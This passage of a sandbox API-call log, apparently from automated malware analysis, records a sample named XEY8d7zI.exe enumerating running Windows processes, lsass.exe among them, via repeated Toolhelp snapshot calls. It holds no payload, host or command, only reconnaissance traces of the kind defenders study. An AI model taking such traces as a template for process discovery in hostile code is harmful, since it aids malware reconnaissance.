szExeFile="lsass.exe")) returned 1 [0111.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.632] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.637] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.679] CloseHandle (hObject=0xc4) returned 1 [0111.679] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.685] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.735] Process32NextW 